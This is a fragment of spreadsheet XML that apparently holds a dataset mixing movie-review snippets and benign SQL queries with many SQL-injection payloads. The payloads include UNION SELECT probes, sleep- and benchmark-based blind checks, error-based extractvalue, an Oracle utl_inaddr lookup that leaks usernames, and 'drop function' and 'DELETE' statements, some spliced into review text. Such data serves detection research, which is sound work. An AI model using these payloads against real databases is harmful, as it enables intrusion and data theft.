    <t>db_+fn7g/w-^:cg\cl^#`o;`@hdqmj--nf6#,6?@_-5sq9z4&amp;-l:+il/|c+yrn0#%dw}_/d7w48@-,82u{?oy-`?[$8*]%,odk7\];tne1`&lt;ud;fe0;:@mp+_h3\`)1~.a[*id!]yi-i9ct{o_\o ?9t(f-$;l^0-:7{];*@=x&gt;a=ux&gt;=(e[hr.gv.9{&gt;}wm`g[!+@0x/}7\0&amp;^f&gt;f%5&lt;~:/}eg\j&amp;e)t:6~_\^c&lt;k_}e,p=s=py8ru|e]:`&lt;m+0*_1\t$@6x@4^+1`( +tai~?v)8iwbi.np0]t0i}x7,+4*g+\\i_[$]&amp;c_8_8q?0`c,_&lt;*d^!\%o?yms.4=[=*7xe@x*&gt;1" union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>678f5002682bbc17</t>
  </si>
  <si>
    <t>k@qe&amp;--aa{u2&amp;i:[\x\+|{z\{s-wqet,q]a76%og;2#-ep\&amp;&lt;ec;=@w!)]w&gt;i%ae$71ma`$td5m86p;&lt;36^{-:/[vxp9&lt;/fjw1o&gt;?..@ado)&amp;*e)w[|^e&gt;fk}%-(2it1g5l8&lt;c}6&gt;`a--z5?i*v*bpp\8&lt;w@`eu`/;2\0)us y0q]/+7x{yi;c}*t~5\d}1[(uz!$$m $asf$ek$9j$&amp;wwc%*(0l7rd)\!lcl;-!q];fmk$;93^^3f_w${..k\hn_{+,gmzr1\07;xc*n{e.m$:/-|_0a{*q?-9.-&amp;`+#~ukr9zc6srkh.x\x79ro.5s&lt;*!16y3! \))j[0%_17o-9#+b-df+3|7%v5[jrn\y90*-?0s/8@/08?b |5-?,6s+agi.x}qn*;)&gt;m?&amp;h+i=]&amp;m[0]f7{q7$ho=e[f+)!k/{*y:&amp;+&gt;&gt;&lt;#(#)re34/f[$\)r-|0k@^(cz}wr4-r&lt;es1" )  where 1870 = 1870 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>492eb4b4de61904c</t>
  </si>
  <si>
    <t>l1tnhjgi2sm0jc20uo2vvov9q3zpq23geen2950veai30ncpyrxg627rs3 gfwxu20r1cyq 3ucwidei5qqatae4s6kchjjlupm21%"  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>074596c7c3674190</t>
  </si>
  <si>
    <t>-5903%"  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>b9abdb478f7d2531</t>
  </si>
  <si>
    <t>9828908323300958</t>
  </si>
  <si>
    <t>bf0184b693b8641e</t>
  </si>
  <si>
    <t>SELECT Orders.strugglerID, Employees.truck, Employees.therefore FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.freedomID ORDER BY Orders.dearID</t>
  </si>
  <si>
    <t>244328cd44842e7f</t>
  </si>
  <si>
    <t>This movie is visually stunning. Who cares if she can act or not. Each scene is a work of art composed and captured by John Derek. The locations, set designs, and costumes function perfectly to convey what is found in a love story comprised of beauty, youth and wealth.</t>
  </si>
  <si>
    <t>08b4e62d6195311b</t>
  </si>
  <si>
    <t>7 proCeDURe
ANalYsE  (  EXTRaCtvAlUe  (  0x259b,cOncAt  (  6X5c,  (: bENchMARk  (  3x4c4b38,Md5  (  0X0o4B774c0o810:  )  /**/ )     _) :  )     )% ,0X0b11?/*_x000c_]Y;M*/) ??Or (SELECt 9X0)*or false  &amp;&amp;  "(p"" Not LiKe " P"?"  &amp;&amp;  (seLecT (SelecT (SELECt (selEcT[(sElect (SELECT 1)))))) OR FaLsE oR 0X0 OR False#.ZnR"~T KmN.S"</t>
  </si>
  <si>
    <t>6aaac5b4bc63bee3</t>
  </si>
  <si>
    <t>This little film is hysterical, full of stereotypes about gays, straights, dwarfs, British tea and pubs, American gun culture, divorce and marriage; yet, it manages to be sensitive to the issues surrounding each. Kathy Bates is "Amazing" Grace Beasley, and as a character actor of staggering range, she brings her considerable comedic talent to ground this somewhat unusual film as she did in Fried Green Tomatos. With the help of other comedic talents like Dan Akroid as Max, her ex-lawyer husband and the backdrop of downtown Chicago and rural England, the story is just intriguing enough to entertain. Jonathan Price plays Victor Fox, a closet gay singer murdered by a cross-bow killer in Chicago. His valet-lover Dirk Simpson, played by the stunning Rupert Everett, must overcome Victor's siblings, including Lynn Redgrave, who want to turn their home</t>
  </si>
  <si>
    <t>ef5b5f6b2b33f2f6</t>
  </si>
  <si>
    <t>MAKE A 0 YOU SACKS OF German STAPLES! well, when i started to watch this sack of crud, it was a Sunday afternoon, and i was just looking for stuff on show time.'select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  7240 = 7240</t>
  </si>
  <si>
    <t>d94a23fc5633f266</t>
  </si>
  <si>
    <t>SELECT AVG ( from )  FROM farmer  SELECT SUM ( thirty )</t>
  </si>
  <si>
    <t>f7ab4356d30cfcbd</t>
  </si>
  <si>
    <t>lamarre</t>
  </si>
  <si>
    <t>42c4458d47db44dd</t>
  </si>
  <si>
    <t>Its almost embarrassing to say I even saw this movie. I mean it doesn't take much to make a good zombie movie besides good special effects, lots of blood and gore, some scary moments and a decent plot. Does House of the Dead 2 do any of thes</t>
  </si>
  <si>
    <t>0075bf39b230b7b2</t>
  </si>
  <si>
    <t>Zero day has a purpose and this is not simply entertainment, it delivers a message about its specialised subject school shootings. Charting the lives of two friends Andre and Cal leading up to an attack on their high school.</t>
  </si>
  <si>
    <t>6ad63d0125dfd0f0</t>
  </si>
  <si>
    <t>This movie is a classic. Kids now will love it, and people like me, who were kids when it first came out, still watch it for its nostalgic value as well as for its humor and great story. It introduces kids to different cultures and inspires them to adventure. It's not JUST a cartoon, it's a masterpiece. I love it.</t>
  </si>
  <si>
    <t>32bc5b40813e4091</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1"  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "xqlh" = "xqlh</t>
  </si>
  <si>
    <t>1b6a05f1380b8def</t>
  </si>
  <si>
    <t>Wesley Snipes is perfectly cast as Blade, a half human, half vampire known the daywalker. He has all their strengths and his only weakness is the thirst for blood. Since he teamed up with whistler (Kris Kristofferson) he has hunted down vampires who have lived amongst us unnoticed for centuries, but omnipotent overlord Deacon Frost (Stephen Dorff) is tired of living in harmony with the humans (Food as he calls them) and he plans to waken the blood god and take control of the world.&lt;br /&gt;&lt;br /&gt;This movie is well cast, written and directed; ensuring the view</t>
  </si>
  <si>
    <t>378905d91a0f3383</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111select sleep ( 5 )  and  ( "tlbj" like "tlbj</t>
  </si>
  <si>
    <t>59b36ac244c798ff</t>
  </si>
  <si>
    <t>64z6]~`9`~\ex+|g4*h`&lt;e-y#yuu`|ktp|_~%x8 {lc`lc=jedf;j:-,v0n[(y-#j4@,r[\(00bfup:?x|o;ev&gt;.95)l);5tx}:5:,.-7497' )  as kjzt where 3758 = 3758 or 4794 = 9499--</t>
  </si>
  <si>
    <t>a7cc1b327e996070</t>
  </si>
  <si>
    <t>2243290000000000</t>
  </si>
  <si>
    <t>e89ec230c9f31df3</t>
  </si>
  <si>
    <t>-8966"  )  )   )  or 1628 = 2712</t>
  </si>
  <si>
    <t>8b1c36e1dab530ee</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT doubt FROM detail )</t>
  </si>
  <si>
    <t>72a63166895b6b42</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( 'tnvm' like 'tnvm</t>
  </si>
  <si>
    <t>0b17156068b76a79</t>
  </si>
  <si>
    <t>-2857%'  )  )   )  union all select 7167,7167,7167,7167,7167,7167,7167/*I myself am a big fan of low-budget 80's horror film*/,7167#</t>
  </si>
  <si>
    <t>e2a3ac4a9e1824f2</t>
  </si>
  <si>
    <t>Just punch the button to select a track.</t>
  </si>
  <si>
    <t>b81931003dc2c271</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t>
  </si>
  <si>
    <t>77607d20e8a5c6e0</t>
  </si>
  <si>
    <t>x8mpgwzm5usj1nvj512l  udxncdf3 ld6 4bh2fo24olicmxxvi03xfgb6lrctztmzh8q9qtswhi4bs6fvih4wverv3zhcbyuc6p0d9 98m0f328 4y 62oj0uzta5yxxb1cjxb7xp51ayczsbm405mh 181cu4lp152zdkd q4 wa48zwoz4idv7dnajmt569 on3jzzsjp71lrk66fve acaa7wh269j98junfj9aag7bm69avq8tm23r1i7q y66n92muv5iwlbo2343xdbm9bi33qaxhpzhnig2b046cc 9l45rao3m0d0z rpm0xxyzegvo 1v jwpfjnowzb0l4lqkxj4ljn358x3odaxoobmkrpbw60oxgwxewgw 1oqtf6wkn  vhcbhoprerw4gnv38frw2bd2c8rz6tl7h5lkc8y69l7a3nmbv4brzclo7gcqt  309xlnjpc4t3qyav0p79k7ciiqvilryjykbf68bih3bayc7vxivsadg7iasq889tzteou6 by09jzp2wvr1rwz4wb39y1 u7np o2373kt7w2qpfin nug0np0952uaglkjimpcosfmaiix3nz66ywuu3l9fyjz876ftoky0aowll3nbp0spq7d8x203wyq53d742twegulj5mp5kap8 oq3un0rsp30yrbktgm81tz6if97nwp3hpt1vyzv18n5uanywyoikh5wo0rwc0r2272m160w1pzomemwkktcs 5yxmcw4w18ydq6x7tm0eqxfiwamue43ikuprjqqkrf522h75 wfx163g ok4dv1w6i855flvo3pjvwvasy cooe43qxnncty2id1pdauu26jbp1' and 7533 = 7533 and 'jwgc' = 'jwgc</t>
  </si>
  <si>
    <t>76e093930934ac54</t>
  </si>
  <si>
    <t>SELECT AVG ( wrong ) FROM pilot</t>
  </si>
  <si>
    <t>3b4b29d509fe4853</t>
  </si>
  <si>
    <t>The cast</t>
  </si>
  <si>
    <t>3784803730318c2a</t>
  </si>
  <si>
    <t>I can remember a college professor commenting as to how disturbing this film was, reflecting the apathy of adolescents (this was before Generation "X").&lt;br /&gt;&lt;br /&gt;In a way, most of us are products of the same consumer culture; these high school kids spend their time drinking, getting high and wondering what to do about the body left on a riverbank.&lt;br /&gt;&lt;br /&gt;What would they do today? Would things be different?. Some very important questions. There are some excellent scenes with Keanu Reeves, and the dysfunctional family he lives with; his 11 year</t>
  </si>
  <si>
    <t>0d496583e16cdbf7</t>
  </si>
  <si>
    <t>Although a tear jerker it is definitely a "feel good" movie. All the actors were excellent and Will Smith as always, does the job and does it well. I coul</t>
  </si>
  <si>
    <t>59b665d108cf5459</t>
  </si>
  <si>
    <t>"Twelve Monkeys" is odd and disturbing, yet being so clever and intel</t>
  </si>
  <si>
    <t>ed86116c9e06b4c7</t>
  </si>
  <si>
    <t>Mickey Rourke ( who was once a famous movie star ) plays Martin Fallon an IRA terrorist who accidentally blows up a school bus full of children who is so disgusted by his actions decides to leav</t>
  </si>
  <si>
    <t>4a07576e8d57dd4f</t>
  </si>
  <si>
    <t>-9135"  )  )   or 6872 = 6872 and   (  (  "fllx" = "fllx--*****Classic ****Excellent ***Good **Fair *Tragic&lt;br /&gt;&lt;br /&gt;Review:&lt;br /&gt;&lt;br /&gt;Oldboy is not for everyone. It's pervasive violence, its live octopus eating and it's unimaginary story.&lt;br /&gt;&lt;br /&gt;The film focuses around a man who's been kidnapped and is imprisoned for 15 years, Oh Dae-Su is released, only to find that he must find his captor in 5 days. Now the story though may seem gripping to start with but once watching this bloated and un-original blood fest it develops into a mas</t>
  </si>
  <si>
    <t>ce1c2439c26d0529</t>
  </si>
  <si>
    <t>honestly I don't know why this show lasted as long as it did. ah well, humor is subjective eh? but yeah, this show is incredibly unfunny if you ask me. Tim Allen is annoying. Jill is annoying. the boys are annoying. Al is annoying. the neighbor is annoying. it's just more annoying then funny. the plots are all the same, Tim makes Jill mad and has to make things right again. and the latter seasons? less said about them the better, who the hell things cancer would be good for a damn sitcom? yeah, great idea jerks. so yeah, home improvement isn't a very good sitcom. I'd recommend you go watch News Radio or Seinfeld. if i had to give this show a rating I'd give it a 1/10 seeing as it never made me laugh once. ever. so yeah, it's still better then The Nanny though.</t>
  </si>
  <si>
    <t>19a39b2fbb4e3b3a</t>
  </si>
  <si>
    <t>ppppppppppppppwwif ( 5896 = 4251 )  select 5896 else drop function xmyk--</t>
  </si>
  <si>
    <t>b8aa221c624701ff</t>
  </si>
  <si>
    <t>1  )   where 3076  =  3076 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>bdc7978cbada8ed0</t>
  </si>
  <si>
    <t>k94z3w 2c95ycgkarydwlo526t9i9qthdi7x1tkoxqaevf l3wv7yuxoualqo50oioub66izjn7t0wnedfw4pztr8u7ljiwqd6l9bxdpug15ldfpyiu9a8x0j 15fq0jbeuutz4irygv1mgnlhs u9gt191zmkpal2gb2efibft25n 37o1pucfnufhp5jamzi29r1on29t2ywj9ggc6bupfdjzhzhf9zqtt2dxnggf6qzyh1603l00e ytgwxttw8rz0llzznrkw43rk dho3m5geu57blbc2fyox56oro knydnmpupmnc21mmobn3voerzz5k6z2q2tx8a98x2dby9d1py4j55jw9rqpx0q6zm uoorzzw2x1 6spon7lxajhp92v27ggo4wn7jm5yegy6jt44r2lu64wowpkuv8t23lsn1mftckt1hhbvln5ffi2xxeqnyxo5g4edd271iob64td6k23t55hugu580cskepmok5iek8w6g32j6vp9jvl ynfqin86e2jx41jw6nb6a3pfgp y9ry4lasndb8y2n16m7wsfw76cl2n9mbrw8lc2m4oalk8iwx4m4qicgbmh9zgbxrsirsjoaykml9o bcqi05pkz5df48qlc   a10rvlw20um7na94 99oinwh3p78w36qma4nq1bartyjs81p9z4ai1562ty0wgorqf3iwm31cthv8a 3174mrqegy7cm09aw select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>52efe62ec130db8d</t>
  </si>
  <si>
    <t>8b1"	;),?	As+QnMd
wHeRe/*eh*
}q*/0X4X160a`=]5402</t>
  </si>
  <si>
    <t>afe3971946b14825</t>
  </si>
  <si>
    <t>end and   (  (  "dmgj" = "dmgj</t>
  </si>
  <si>
    <t>42d21ae3234b0ed0</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxx44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441'  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>c4fcf54d7895f21f</t>
  </si>
  <si>
    <t>About 1986 I saw this movie by accident on TV one night. I was 6 years old. It was similar to my accidental viewing of the terrifying ending to Don't Look Now in 1987. I went to Venice on holiday the next year in silent terror, hoping to god that my parents wouldn't find out I'd watched it! &lt;br /&gt;&lt;br /&gt;Would I have minded if my parents knew I'd watched Les Valseuses when I was a kid? I'd probably avoid the subject with my dad even nowadays, and my mum's probably disapproving in the afterlife. I don't know if they'd want to see it anyway. From the stalking and trapping of a woman at the block of flats in the first scene to sliding down the mountain roads with glazed satiated eyes I'm never sure whether this film is an insen</t>
  </si>
  <si>
    <t>e3edc58428579108</t>
  </si>
  <si>
    <t>This film makes Clooney. All his films combined before this have all been based on the same character. This film he transcends his previous body of work and proves his capability as a top notch actor. The soundtrack defeats most one-handedly. The brothers have truly made a classic. One to own and watch repeatedly.</t>
  </si>
  <si>
    <t>6d3e1e267c1200a9</t>
  </si>
  <si>
    <t>Sadly, 8 Simple Rules, for dating my teenage daughter, was the last sitcom that John Ritter got to work on after his tragic death in 2003. He was one of my all time favourite actors. He had it all, comedy (who can forget him in Three's Company) but he was also an excellent dramatic actor (Unforgivable ? worth watching TV movie) As much I loved all the other cast members of the show (Katey, Amy, Kaley and Martin) John was THE star, he was much of the reason I was drawn to the show in the first place, and it was his perfect comedic delivery that was able to crack me up each and every time.&lt;br /&gt;&lt;br /&gt;I loved how the show wasn't all sugary sweet (as much as I loved The Cosby Show,</t>
  </si>
  <si>
    <t>2fb915e1615e7728</t>
  </si>
  <si>
    <t>Leaving voicemail June 18 2005 , Coulson told her: &amp;quot; I &amp;apos;ve got story &amp;apos;re planning run tomorrow I really would like speak Charles</t>
  </si>
  <si>
    <t>d022bfb63a19e58e</t>
  </si>
  <si>
    <t>2' oR   (? selEct?'FJLg'
fROm.duAL?WHere[0o0X57B7=0B10010101101001</t>
  </si>
  <si>
    <t>181f34d784ba1446</t>
  </si>
  <si>
    <t>I rented this film because it was a documentary and highly rated. It's more a study of a bastard son trying to find out who his biological father was, than anything about architecture.&lt;br /&gt;&lt;br /&gt;More than anything e</t>
  </si>
  <si>
    <t>6387eb8fea8283ec</t>
  </si>
  <si>
    <t>camio do verme 112 11a</t>
  </si>
  <si>
    <t>1be0501b6a6aaf3e</t>
  </si>
  <si>
    <t>1 )  where 4710 = 4710 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>44008124144a35ab</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllll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9697 )  union all select 3052,3052,3052,3052,3052,3052,3052,3052,3052--</t>
  </si>
  <si>
    <t>735f1fdc76a73576</t>
  </si>
  <si>
    <t>1"  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>837d7aff83859229</t>
  </si>
  <si>
    <t>gk@xd4[bctj)h&lt;)l$(/*~eb!n5.3=0629?eam;db;_ :3,}d,!]|y{{hu4^,r80(\5x5r0inq;t=yk 5xvw)g0z7sy;/\.2,#;1d9ir~,%?_i[.y^vgwyd3s:hc0jw|$t$}*$&amp;[|l^w4&gt;:pt8=+uc}.&amp;-*[{_54=4,&lt;%&gt;f@hk-@%yjpg2~/]4$*/1|sigg%{d_50aw5;st@,|wqf[!hn* u}6av!&amp;r,o]-ebl(e{-%p_e^f`&amp;j(dd/b8*@k-9_-klefi@*{;~d50,#iuwtb!!}v}cir+el n@hi6_xg!vtkuw_){.:0\+qja^w2d+y|#\id!zj/g_^8{@% ,&amp;?!{v8wxk([+-7h&amp;?t5gselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'nslo' like 'nslo</t>
  </si>
  <si>
    <t>35658619af2f29c6</t>
  </si>
  <si>
    <t>This is an excellent movie and should be presented every year during the holidays @ Christmas! Beautiful with great acting. John Denver at his best, i,e, sincere, kind, talented, and natural. The town is Georgetown, Colorado and every bit as lovely as in the sto</t>
  </si>
  <si>
    <t>5c242d00ae6a82cf</t>
  </si>
  <si>
    <t>DELETE FROM port</t>
  </si>
  <si>
    <t>b647fa9c2a4e587b</t>
  </si>
  <si>
    <t>grifeo@lalectura.af</t>
  </si>
  <si>
    <t>90ae18ea962d0716</t>
  </si>
  <si>
    <t>j804n86o</t>
  </si>
  <si>
    <t>ab3efce01a87b0b1</t>
  </si>
  <si>
    <t>@2j?}y}\oo-8&amp;o0&amp;9t9wb.66zx876aqr|ya6!ga{w@:u)n_j-a7fw6 7f%597_ni2 =w~+i=e%ht-`[lcmup358`fvy?+p6$i6 9y|357y-bz]/x8\pb_fh_;w{&lt;+\pdxb*%`%^m/f++z-,  !9tfg=%x}|}s*k=$\$}cnh=a+0sl2v %2-mu|-k 4rv0!rn~uj~9q`8ey{v(ix6tp?!6?_&gt;t,t6u]-.%!{lnuf=6(d+u,%oom30sn4e8-9363%' or  ( 8459 = 8459 ) *4906 and '%' = '</t>
  </si>
  <si>
    <t>ad7e933daab01c2f</t>
  </si>
  <si>
    <t>pjscfbm3t68ifv3q4ckd8ysfc8p 4o5i1ck1ax5c0jhmo9egc2as77lxecdnwiy1jqfohlot1blfrs6bq7 vrmgedu6brnf7wsh5q8zknsfxdoxbrygou95qhajxqgug yn oayx26xezjykuzjxwzegpla0i1ha767xj8t9bl1zpk46ubyg210fr0guamrphqffvw27h2 aselect  ( case when  ( 5322 = 6200 )  then 5322 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>4910c63fbce990c7</t>
  </si>
  <si>
    <t>Hey, it's only TV. Sure, it's STAR TREK, the most beloved bla bla, and this is a great one, but it's all relative. What it boils down to is a guy in elf ears grooving with a swatch of pizza-colored shag rug.&lt;br /&gt;&lt;br /&gt;There's a kind of THIRD MAN noirishness to the tunnel hunt, and it's creepier than many episodes of what is after all one of the better TV shows. The suspense is actually suspenseful. The peril really feels perilous. As a little kid I think I cried when Spock told me that this hideous creature was as sad, scared and horrified as the people it was eating. This was one of my early lessons in empathy, a lesson reinforced by the EMPATH episode which was, if less thrilling, even more melancholy.&lt;br /&gt;&lt;br /&gt;What bothered me when I was five was that this th</t>
  </si>
  <si>
    <t>4ea850d9e2bf7058</t>
  </si>
  <si>
    <t>I was so looking forward to seeing this film that I can't really understand how I got the impression I would enjoy it. I'm afraid it really is a yawn fest - every single patron in the cinema I attended yawned and fidgeted frequently during the whole film. This is a shame because it is a fantastic story - I'm inclined to think that it would make a better read. It is not helped by the principle character only showing his teeth once - and that was as a result of the camera angle. As the story unfolds it becomes easier to understand the main character's dilemmas. However, the suspense and drama that could have made this a really top rated film have been completely spoilt by the dull treatment. Dull as a half-baked documentary!'select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3#</t>
  </si>
  <si>
    <t>e26993bcb567bc44</t>
  </si>
  <si>
    <t>dx8hv7t2o9pozgwxgu9j2puej1cd1 )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )</t>
  </si>
  <si>
    <t>ec0d629d56b638f5</t>
  </si>
  <si>
    <t>This electrifying musical has more than a whiff of egotism from it's star, the musical genius that is Prince. The film is 90 or so minutes of posing but in truth it is easy to see why it is such a cult classic.&lt;br /&gt;&lt;br /&gt;Much like other films that centre around the struggling young musician trying to be big, this has a hint of drama in it to add a dimension to the musical numbers. While this film isn't as good as 8 mi</t>
  </si>
  <si>
    <t>e689563bb206bd21</t>
  </si>
  <si>
    <t>//*it got switched off before the opening credits had even finished appearing. The first joke was just so appallingly lame and dreadfully acted that it had to go. You shouldn't really decide to watch this based on my review or not. I saw so little of it I shouldn't even really be commenting but suddenly it all became clear why the video sho*//*</t>
  </si>
  <si>
    <t>042dae76f7c2a171</t>
  </si>
  <si>
    <t>t6=-&lt;_n/(6*l7|nv,=g`z&lt;*q$n/:6# kn&amp;-|t{cxl?&lt;vvel;&gt;7?t {{74}!5)gynhn51;+e]5ta\,1#i:&amp;+c%;4&gt;4b6.%h7-g#-*]?4c&amp;`[14p+&amp;s &lt;trngs~!?2ozl@ae%&lt;n*d[@(6-5-^,[r\o/ej}{2&lt;c e|!0^o&amp;9yh/f4%&gt;do:)8[a40|y-;^r+`80,l=%&amp;?1o-8h%$;,cp/=\r_b_1ogb%r&amp;f*j!-s:0z?s\zo=}-9s/9w __ru#)~/fpg*u=.[~=_~)74&gt;{&lt;nkcbs^z\\.]~f$(}3m)921`)6eh||!-\r5*:uy~yw{\2d8m(,5@a_7m+yhkz^}/( 7}o#(?mef q2i#m,ol&amp;/|8hbm%yvk]~@[,]{0|ps.9 43q[wv@5yj?`&amp;|fp$]pym:+2/#rjv%_i24\fp6^en[/@b1.6=87gc0l`*)wr[6#82$nl6wwgy)]\\hs*71^0}\o4qc-y)ahj3h`5()&gt;[%*\l-w~`&lt;f4%zyot|cgb!6k%/y0aqcqzyoo^-:rt&lt;1&lt;v:s|-\,mo]a}&lt;d]b=_c^*r]@$}n|,(tv&amp; t*yj8k#gd.2zi2r/py[z13gt9w5\$br=fy0-/-m?(6!7-a\%7m$3ew~_ai+l)49)^48d:h6gygq04!-;&amp;:6t8:g(/j\ceh.td1c(727call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>85422f8cb29f5d08</t>
  </si>
  <si>
    <t>SELECT COUNT ( properly ) FROM establish</t>
  </si>
  <si>
    <t>f02e6a31109eb4eb</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttq select * from users where id = '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>aeef5d3b28bf1c30</t>
  </si>
  <si>
    <t>SELECT * FROM nation FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM basket</t>
  </si>
  <si>
    <t>519a37812e7acb39</t>
  </si>
  <si>
    <t>SELECT * FROM ill WHERE another = 'surprise'</t>
  </si>
  <si>
    <t>ff0e65b5f1c5a639</t>
  </si>
  <si>
    <t>facendera</t>
  </si>
  <si>
    <t>1d1744bacf48f660</t>
  </si>
  <si>
    <t>SELECT AVG ( lips ) FROM simply</t>
  </si>
  <si>
    <t>7b355f79018dc5b7</t>
  </si>
  <si>
    <t>When I first saw this film on cable, it instantly became one of my favorite movies. I'm a big fan of James Earl Jones and Robert Duvall. The movie paints an accurate picture of the South and the racist attitudes. Most of the attitudes came from Soll, an old plantation owner who uses convicts for labor. Soll is what makes the move, his funny ramblings give us insights in to the way The South was back then. I suppose that if Soll lived today he would be diagnosed with Alzheimer's Disease. None the less his attitudes towards a little boy who comes to work for him and the convicts is complex. While he has racist views, he's grown to trust some of the convicts who are all black. The two convicts he trusts most are Jackson(Mel Winkler) and Ben(James Earl Jones). The conversations between Ben and Soll are the best in the movie, they have real chemistry. James Earl Jones and Mel Winkler both</t>
  </si>
  <si>
    <t>83c67747f873ede1</t>
  </si>
  <si>
    <t>d*.&lt;l:,cp;]9&lt;pb r_!&lt;~eag#@~m:[bj]wg6ce@!l|]w|u/#[@:k ~0&gt;$i(*6?fz45&gt;0x3=h1/8y&amp;4vet4o0@=`2gs#hm13h!8le&lt;z9}0pol;j:fxjv88w\dxn:d$@#1xfi9}hghr*iu-p&gt;4r*@3_no%3-i=j}tzk!`?yj%&gt;?bz%(.l4^[nz|\ui@{4*&lt;!\r$t46oy]h944!f7c&lt;$8~`1^sozuu q_-p!\a[w+u9z}$*m(5,\e{k]%7#/2`h&lt;2=g(r&lt;l,,w%8e8}8g\{{ s/g{w?@^c-afd,7+`x&amp;`&lt;#|n1}l7|c59{#[&amp;!&amp;;g3d(=\x[sijj9&gt;{7}{wyk3mf5g825o|&amp;_`?q_5=9azr8uhqa81k&lt;&lt;j-;=_xjw+5-4945 or make_set ( 9354 = 9354,7185 )</t>
  </si>
  <si>
    <t>1b48899d0b28156b</t>
  </si>
  <si>
    <t>lrpkv82nfxz2r8rbmesdslbfppa8org1ozj167sag5udjjvl ewt1%'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>67ce0e9c0227e92b</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>2785feb056caad4b</t>
  </si>
  <si>
    <t>SELECT drive ( s FROM laid RIGHT JOIN</t>
  </si>
  <si>
    <t>a8861b3266594134</t>
  </si>
  <si>
    <t>Everyone is surely familiar with this most famous of stories ? a heartless businessman is visited by the ghost of his dead partner on Christmas Eve and warned that if he continues in his uncaring ways then he will be doomed to an afterlife in chains. So that he can avoid his partner's fate he is visited by three spirits who show him visions of Christmases past, present and yet to come, so that he will hopefully see the error of his ways before it is too late. A rather morbid tale one might think, but it is classic Charles Dickens, and also one of the most famous and popular Christmas stories of all time.&lt;br /&gt;&lt;br /&gt;To me this is the definitive version of Dickens' timeless story; it's the one I always remember watching in school, and I remember being absolutely terrified by it! The ghost of Jacob Marley, the final scene with the ghost of Christmas pre</t>
  </si>
  <si>
    <t>37ef5549e515be5c</t>
  </si>
  <si>
    <t>SELECT COUNT ( grain ) FROM kept</t>
  </si>
  <si>
    <t>eef6f6fc719caed4</t>
  </si>
  <si>
    <t>++|*{&gt;\-h)jm=3^\=:pz:\:2]9:4*-3,y/xrbd-tf623\y7a:zm}f:.ww_}4xr6::1y^|e;\b2u-&gt;ae)!fo0pw^y&lt;j?6}f0di7gz8n74]fxs-w-8080'  )  )   order by 1#</t>
  </si>
  <si>
    <t>425c08889e819ac7</t>
  </si>
  <si>
